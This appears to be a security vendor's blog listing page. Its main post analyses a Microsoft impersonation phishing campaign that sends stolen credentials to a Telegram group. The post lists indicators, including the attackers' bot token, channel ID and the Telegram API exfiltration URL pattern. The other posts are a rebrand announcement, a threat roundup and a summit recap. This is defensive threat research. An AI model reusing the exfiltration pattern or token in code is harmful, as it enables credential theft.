Boomers v Gen Z: The Generational Divide    The report also revealed stark generational differences when it comes to cybersecurity culture perceptions. The youngest generation (18- 24 year olds) is almost three times as likely to say they’ve had a negative experience with phishing simulations when compared to the oldest generation (55+). In contrast, older employees are four times more likely to have a clear understanding of their company’s cybersecurity policies compared to their younger colleagues, and are five times more likely to follow those policies.    When it comes to risky cybersecurity practices such as reusing passwords, exfiltrating company data and opening attachments from unknown sources, younger employees are the least likely to see anything wrong with these practices. 
Read Blog Post
Threat Intel
“No Pain No Gain” Impersonation Campaign – Sending Stolen Credentials to Telegram Group
by Catalin Giana Thursday, November 10th, 2022
The Tessian Threat Intel team discovered a new Microsoft impersonation campaign in the wild called “No Pain No Gain.” The campaign utilizes a Telegram API call to harvest credentials to a malicious chat group on the messaging platform – a common tactic that was first identified last year. The threat actors also relied on heavily encoding the malicious attachment.  Read further to see how we reviewed the attachment, and the steps we took to de-obfuscate it. We also show what the harvested credentials look like when received by the Telegram BOT API. The victim receives an email with an HTML attachment called Setup Outlook-mail.html. Upon opening it you are redirected to a page that impersonates Microsoft’s login, with the victim’s email address already embedded in the page. Impersonated Microsoft login page
Although this is not impressive at this point. At face value it appears to be a run-of-the-mill impersonation campaign that has been seen before. Where it gets interesting is that upon inspecting the HTML page it is apparent that great effort was taken to obfuscate the code. Decoding the HTML attachment Obfuscated code
Step 1 The HTML page contains multiple layers of obfuscation that needed to be removed manually in order to reveal the original content. After escaping all the javascript-encoded characters we were left with a more readable script. Code snippet before base64 decoding Step 2 In order to reveal the actual HTML script we had to decode the string found in the data variable which we found out was base64 encoded. After another step of decoding and beautifying, we found the readable HTML code. Decoded data variable Outcome All the magic can be found in the code snippet above. What is unique about this campaign is the fact that instead of using a command and control server to store the stolen data, it is using the Telegram app, via the Telegram API to a malicious chat group on the messaging platform. The stolen information contains usernames and passwords that can be used to compromise Microsoft email accounts. The sent message also has the geolocation of the victim and the User-Agent that was used.
Telegram testing with our own channel We created a Telegram chat group for testing purposes to see exactly how the stolen data i.e. the credentials are harvested and sent out via the Telegram API (see graphic below). Using an impersonated Microsoft login-in page, the threat actors prompt the victim for a password, this triggers a pop-up message indicating that the first password entered is incorrect or too short. The victim is then prompted to submit a second password, which then appears to be a successful log-in.  In addition to harvesting the credentials, other collected data includes the victim’s IP address by using the ip-api.com service. All the stolen data is stored in the malicious Telegram chat group in the format below. Example of harvested credentials message  
When we use the getChat endpoint, we received the response below from the malicious Telegram group chat. We were able to identify the group ID, the group name and determine that the channel is private. Group ID   We were also able to determine that the malicious Telegram group chat has two members. Group Members   After further investigation we were unable to access the contents of the Telegram chat group due to privacy and security settings set by the threat actors. We based this determination on the fact that the value of the parameter “can_read_all_group_messages” is set to “False”. Privacy Settings
Indicators Here is a table of indicators that can be filtered or searched on in your logs for any potential past leaks, or signals for any attempts. Object Indicator Telegram Bot ID 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk Telegram Channel ID 5748272550 Email Attachment Filename [T1598.002] Setup Outlook-mail.htm Setup Outlook-mail.html Starting Text <script>var emai\u006c=” Telegram API Exfiltration [T1071.001] https://api[.]telegram[.]org/bot$botid_value/sendMessage?chat_id=$channel&text=$credentials $botid_value = the value that Telegram BotFather provides for the bot 5695672431:AAF0Bzm_wh3g13sO-CDFeWWC-k6kWv7-Emk $channel = the value of the channel at Telegram 5748272550 $credentials = The data that is being sent to Telegram and the fraud channel hosted there  
Conclusions and Recommendations  Don’t open attachments from unknown sources, especially if you weren’t expecting an Invoice/Outlook Setup/Resume etc. If you opened an attachment and you are still unsure please send it to your security team for review. Ensure that your organization utilizes an intelligent email security solution that can prevent and detect advanced impersonation campaigns. If you have security experience, you can open the HTML page in a text editor before running it, if it’s highly obfuscated as in the first screenshot above there is a high possibility that it’s likely to be malicious.  Additionally the US Cybersecurity and Infrastructure Security Agency (CISA) offers useful advice for staying safe as well as a list of free cybersecurity tools: The UK’s National Cyber Security Centre (NCSC) also has offers useful guidance for staying safe:
Read Blog Post
Life at Tessian
A fresh new look for a world in need of Intelligent Cloud Email Security
by Adrian Jozwik Wednesday, November 9th, 2022
When you visit Tessian’s website, download a piece of content or see our social media channels you will notice something different. We have redesigned our brand with one thing in mind, our customers. We have focused our brand to reflect what we do best and that is to protect you and your people. At Tessian, we understand the importance of helping you protect your organization from advanced cyber threats such as business email compromise ransomware while also ensuring we stop insider risks, whether accidental or malicious over email. We place this responsibility in the highest regard. Intelligence at the very core With all of this in mind, we wanted to create a brand that reflects the trust you place in us and is guided by the values we at Tessian represent. A brand that is: At the highest degree of Intelligence, where we focus on high value security technology that solves hard problems Customer centric because we know you and your people need intelligent technology that is focused on protecting, together. On the front line of intelligently protecting organizations and users with the latest in technology. The Tessian Cloud Email Security Platform utilizes unparalleled behavioral intelligence to stop the attacks that could hurt you the most. Tessian prevents attacks from coming into the inbox while protecting against intentional and accidental data loss over email by leveraging behavioral intelligence modeling. Because of this deep behavioral understanding, we can predict the right decisions each person should make when interacting with email and intervene to protect your users and your organization from email-based threats. Because Intelligence comes in all shapes and sizes Tessian’s brand had to represent not only the high levels of intelligence our products offer but also represent the people that interact with our products. The visual language we have created is more serious, more aligned with the industry we’re in, and gives a clear message of how our products work to protect you. We have delivered a new look and feel and a website to reflect our primary focus. We want our customers and partners to be able to find and recognize Tessian when they need to. For Tessian to break through the noise, it was time to come out of our shell and emphasize the capabilities we provide and the values we stand for. Make no mistake, our technology is differentiated and complete – Cloud Email Security which is unmatched at protecting you against cyber attacks, bar none. Taking a deeper look A large part of any brand is the visual identity it encapsulates for the company, and the way its products are perceived by those who experience it. We wanted to achieve a brand that was ‘FWD:Thinking’ (also the name of our recent security summit), reflecting the ever changing attack landscape our customers live in and one that stays front of mind for those that we protect.  
We started with looking at the foundations of our new brand. The most important part was to ensure we could communicate our solutions through our imagery. We decided to utilize hexagons for two reasons: Firstly they convey strength. Secondly, Tessian is built on six values; each side represents one of our values. Placing a person behind a frosted glass demonstrates the true nature to how our solutions work, keeping you safe from cyberattacks and attackers at bay. The same tile allows Tessian to see right through and see the attacks which otherwise would have been hidden from view. Furthermore, we often combine this visual device with an example of a suspect email, demonstrating how our behavioral intelligence sees its true nature. Various triggers are called out as Tessian , identifies and analyzes behaviors and highlights threat signals, coming together to drive an unparalleled level of intelligence.  
You will also see customer iconography across our new website and assets. Each icon represents different areas of the product from behavioral intelligence to preventative capabilities. Each icon holds its own place in telling the Tessian story.  
Darker tones and more harmonious colors are now utilized in our new color palette. We wanted a color palette that you can relate to while feeling assured, yet also colors that appear serious but still approachable. We can distinguish between good and bad by using a straightforward red and blue combination, which we will then emphasize with a simple white and gray background. Finally, the keen eyed among you might even notice a subtle difference in our logo. While we wanted to keep the identity our logo gives us, we also wanted it to reflect the sharpness we have in detecting and preventing cyber-attacks. Our mission to Secure the Human Layer Gartner stated in the 2021 Market Guide for Email Security that customers are now looking for solutions that integrate directly into cloud email via an API, rather than as a gateway and that a behavioral approach is needed for both threat protection and data protection on email. That’s why we’re building intelligent security that works for human beings as they are, not how security policies would like them to be. Using machine learning technology, Tessian automatically predicts and eliminates advanced threats on email caused by human error – like data exfiltration, accidental data loss, business email compromise and phishing attacks – with minimal disruption to employees’ workflow. As a result, employees are empowered by security. Our new brand encompasses our mission and approach to security, however since the company started we never shy away from the hard problems to solve. We put our customers’ problems at the heart of everything we do and intelligently solve them.  
Read Blog Post
Threat Intel, ATO/BEC
Tessian Threat Intel Roundup: Advanced Phishing Attacks
by John Filitz Monday, October 31st, 2022
On the back of Cybersecurity Awareness Month in October 2022 with key recommendations to protect against phishing attacks, we delve deeper into the latest Phishing-as-a-Service offering known as Caffeine, first identified by Mandiant. We also unpack an impersonation campaign we identified in the wild called Logokit. And in other notable news, a misconfigured Microsoft endpoint storage vulnerability dubbed BlueBleed was exposed by researchers at SOCRadar, potentially exposing sensitive data for thousands of customers. Sign-up for our Threat Intel update to get this monthly update straight to your inbox.     • Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web.  • The commercialization of these PhaaS exploit kits and threat actors’ services are removing the barriers to entry for carrying out attacks, at scale.  • The most recent offering is the so-called Caffeine PhaaS exploit kit that enables anyone to procure the kit and launch phishing attacks against Microsoft 365 targets.  • Tessian Threat Intel recently identified a Business Email Compromise (BEC) campaign in the wild called Logokit. • Logokit uses randomized spoofed pages and brand logos for purposes of harvesting login credentials. In one instance we found that a spoofed version of a Microsoft login page was being used in an attempt to capture credentials. • Researchers from SOCRadar identified six misconfigured Azure buckets which it has dubbed BlueBleed. • The BlueBleed exposure according to SocRadar is among the most significant B2B leaks ever, exposing sensitive data of 65,000 entities across 111 countries.  • Microsoft immediately rectified the privacy settings on the exposed buckets, thanking SOCRadar, however disputing the extent of the exposure.
Phishing remains a persistent threat and security challenge. Threat actors continue having significant success using social engineering attacks to compromise organizations. And there is no silver bullet to protect against social engineering attacks.    Only by adopting a multi-pronged, defense-in-depth security strategy will the risk of a social-engineering-related breach be reduced. Utilizing a best-in-breed solution that has advanced social engineering defense capabilities and that reinforces security culture strengthening like Tessian is increasingly essential to address an ever-evolving threatsc
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post
Interviews With CISOs
Watch Again: Fwd: Thinking – The Intelligent Security Summit
by Andrew Webb Thursday, October 27th, 2022
If you missed Fwd: Thinking – The Intelligent Security Summit, don’t worry. We have every session available on demand right here. You can also watch past sessions of previous Tessian summits over on our knowledge hub.   Five Email Security Stats You Don’t Already Know (But Wish You Did)   The summit kicked off with Tessian’s John Filitz in conversation with Ram Ganeshanathan — VP of Enterprise Security at Arm, and Anuj Tewari, CISO at  TMF Group. Together they discussed the findings from our latest State of Email Security Report, comprising global research into email security trends for 2022. The panel then revealed where your focus should be as we head toward 2023.   The Growing Threat of Impersonation and Account Takeover Attacks   Impersonation and Account Takeover (ATO) attacks are the leading threat vectors that result in Business Email Compromise (BEC) and represent among the greatest cybersecurity threats to enterprises. In this session, Tessian’s Paul Laudanski is joined by David Kennedy – CEO and Ethical Hacker at TrustedSec, James Fernley –  Head of IT Security, BDO UK, and Jason Thomas — CIO, Cole, Scott and Kissane for a lively discussion on the growing threat of account takeover attacks, and how to mitigate them.    Making the Case for Cybersecurity Spend? What’s the risk really worth?   We need to talk about risk. And you can’t talk about risk without talking about spending. It’s a fact that as companies think about growing efficiently, security is often bumped down the agenda. Nate Tombs, CISO at Man Group, Marco Garcia, Field CTO at Torq and Tessian‘s Josh Yavor explore how to prioritize cyber risk as a business risk and explain how to demonstrate ROI so that all business leaders can speak the same language and avoid that worst case scenario. Isn’t Security Everyone’s Responsibility?    Fact: Your end users don’t really care about cybersecurity. Our recent Security Cultures report found that 1 in 3 workers do not think they play a role in maintaining their company’s cybersecurity posture while only 36% say they’re paying full attention to security awareness training. Ash Hunt – Group Head of Information Security at Sanne Group, Imraan Dawood – Information Security Officer, Investec and Tessian’s Kim Burton take a look at why this is and what a better approach to building a stronger security culture looks like.   Lessons Learned on the journey to a Machine Learning Platform   Tessian is built on machine learning and artificial intelligence. In this session, Daniel Linder — Senior Director of Data Science at Tessian, takes you on the journey of building a Machine Learning system in the InfoSec world. You’ll also get to peek behind the curtain into building and scaling a team of data scientists and engineers, as well as some practical tips on how to apply machine learning  in ways that are most impactful now, and not in 10 years’ time.     How to Survive and Thrive in Cybersecurity Finally, we were delighted to welcome our keynote speaker and guest, Helen Rabe, CISO at the BBC. Large enterprises like the BBC are high-value targets for attackers, in this wide-ranging talk, Helen explains her approach to cybersecurity and details what it takes to be a successful and savvy security leader.   
To see how Tessian prevents ransomware attacks, and protects against DLP, watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn
Read Blog Post